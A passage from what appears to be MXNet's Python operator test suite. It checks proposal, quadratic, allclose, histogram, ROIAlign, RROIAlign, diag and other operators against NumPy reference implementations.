rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
# Preparing the output of elements of the array, which are considered as "not close" AND
# corresponding elements of comparison CPU/GPU/Python vectors, which are considered as "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes == True))
idx = idx.reshape(1, idx.size)
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@with_seed()
def test_allclose_function():
allclose_function([default_context()])
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
length = mx.sym.Variable("length", shape=(10, 10, 10))
sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_context_num_gpus():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
@with_seed()
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
